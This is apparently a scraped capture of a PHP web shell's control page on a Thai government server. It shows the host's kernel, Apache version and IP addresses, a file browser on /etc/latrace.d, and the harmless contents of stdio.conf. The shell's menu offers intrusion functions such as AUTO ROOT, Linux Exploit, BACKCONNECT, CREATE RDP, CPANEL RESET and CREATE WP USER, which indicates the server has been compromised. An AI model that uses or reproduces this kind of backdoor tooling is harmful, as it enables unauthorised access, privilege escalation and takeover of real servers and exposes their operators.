Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
latrace.d /
[ HOME SHELL ]
Name
Size
Permission
Action
sysdeps
[ DIR ]
drwxr-xr-x
ctype.conf
392
B
-rw-r--r--
dirent.conf
825
B
-rw-r--r--
dlfcn.conf
417
B
-rw-r--r--
fcntl.conf
643
B
-rw-r--r--
getopt.conf
273
B
-rw-r--r--
inet.conf
655
B
-rw-r--r--
ioctl.conf
68
B
-rw-r--r--
libintl.conf
651
B
-rw-r--r--
libio.conf
646
B
-rw-r--r--
locale.conf
286
B
-rw-r--r--
misc.conf
292
B
-rw-r--r--
mman.conf
976
B
-rw-r--r--
ncurses.conf
10.77
KB
-rw-r--r--
netdb.conf
3.84
KB
-rw-r--r--
pthread.conf
7.51
KB
-rw-r--r--
pwd.conf
869
B
-rw-r--r--
resource.conf
2.24
KB
-rw-r--r--
signal.conf
2.56
KB
-rw-r--r--
socket.conf
3.29
KB
-rw-r--r--
stat.conf
1.6
KB
-rw-r--r--
stdio.conf
3.85
KB
-rw-r--r--
stdlib.conf
6.18
KB
-rw-r--r--
string.conf
2.77
KB
-rw-r--r--
syslog.conf
198
B
-rw-r--r--
term.conf
934
B
-rw-r--r--
termios.conf
671
B
-rw-r--r--
time.conf
1.6
KB
-rw-r--r--
typedefs.conf
472
B
-rw-r--r--
unistd.conf
4.3
KB
-rw-r--r--
utmp.conf
564
B
-rw-r--r--
wait.conf
419
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : stdio.conf
/* /usr/include/stdio.h */ int remove(char *filename); int rename(char *old, char *new); int renameat(int oldfd, char *old, int newfd, char *new); FILE *tmpfile(void); FILE *tmpfile64(void); char *tmpnam(char *s); char *tmpnam_r(char *s); char *tempnam(char *dir, char *pfx); int fclose(FILE *stream); int fflush(FILE *stream); int fflush_unlocked(FILE *stream); int fcloseall(void); FILE* fopen(char *filename, char *modes); FILE* freopen(char *filename, char *modes, FILE *stream); FILE* fopen64(char *filename, char *modes); FILE* freopen64(char *filename, char *modes, FILE *stream); FILE* fdopen(int fd, char *modes); FILE* fopencookie(void *magic_cookie, char *modes, void *io_funcs); FILE* fmemopen(void *s, size_t len, char *modes); FILE* open_memstream(void *bufloc, size_t *sizeloc); void setbuf(FILE *stream, char *buf); int setvbuf(FILE *stream, char *buf, int modes, size_t n); void setbuffer(FILE *stream, char *buf, size_t size); void setlinebuf(FILE *stream); int fprintf(FILE *stream, char *format); int printf(char *format); int sprintf(char *s, char *format); int vfprintf(FILE *s, char *format); int vprintf(char *format); int vsprintf(char *s, char *format); int snprintf(char *s, size_t maxlen, char *format); int vsnprintf(char *s, size_t maxlen, char *format); int vasprintf(void *ptr, char *f); int __asprintf(void *ptr, char *fmt); int asprintf(void *ptr, char *fmt); int vdprintf(int fd, char *fmt); int dprintf(int fd, char *fmt); int fscanf(FILE *stream, char *format); int scanf(char *format); int sscanf(char *s, char *format); int vfscanf(FILE *s, char *format); int vscanf(char *format); int vsscanf(char *s, char *format); int fgetc(FILE *stream); int getc(FILE *stream); int getchar(); int getc_unlocked(FILE *stream); int getchar_unlocked(); int fgetc_unlocked(FILE *__stream); int fputc(int c, FILE *stream); int putc(int c, FILE *stream); int putchar(int c); int fputc_unlocked(int c, FILE *stream); int putc_unlocked(int c, FILE *stream); int putchar_unlocked(int c); int getw(FILE *stream); int putw(int w, FILE *stream); char* fgets(char *s, int n, FILE *stream); char* gets(char *s); char* fgets_unlocked(char *s, int n, FILE *stream); size_t __getdelim(void *lineptr, size_t *n, int delimiter, FILE *stream); size_t getdelim(void *lineptr, size_t *n, int delimiter, FILE *stream); size_t getline(void *lineptr, size_t *n, FILE *stream); int fputs(char *s, FILE *stream); int puts(char *s); int ungetc(int c, FILE *stream); size_t fread(void *ptr, size_t size, size_t n, FILE *stream); size_t fwrite(void *ptr, size_t size, size_t n, FILE *s); int fputs_unlocked(char *s, FILE *stream); size_t fread_unlocked(void *ptr, size_t size, size_t n, FILE *stream); size_t fwrite_unlocked(void *ptr, size_t size, size_t n, FILE *stream); int fseek(FILE *stream, long off, int whence); long ftell(FILE *stream); void rewind(FILE *stream); int fseeko(FILE *stream, __off_t off, int whence); __off_t ftello(FILE *stream); int fgetpos(FILE *stream, fpos_t *pos); int fsetpos(FILE *stream, fpos_t *pos); typedef long __off64_t; typedef void fpos64_t; int fseeko64(FILE *stream, __off64_t off, int whence); __off64_t ftello64(FILE *stream); int fgetpos64(FILE *stream, fpos64_t *pos); int fsetpos64(FILE *stream, fpos64_t *pos); void clearerr(FILE *stream); int feof(FILE *stream); int ferror(FILE *stream); void clearerr_unlocked(FILE *stream); int feof_unlocked(FILE *stream); int ferror_unlocked(FILE *stream); void perror(char *s); int fileno(FILE *stream); int fileno_unlocked(FILE *stream); FILE* popen(char *command, char *modes); int pclose(FILE *stream); char* ctermid(char *s); char* cuserid(char *s); int obstack_printf(void *obstack, char *format); int obstack_vprintf(void *obstack, char *format); void flockfile(FILE *stream); int ftrylockfile(FILE *stream); void funlockfile(FILE *stream);
Close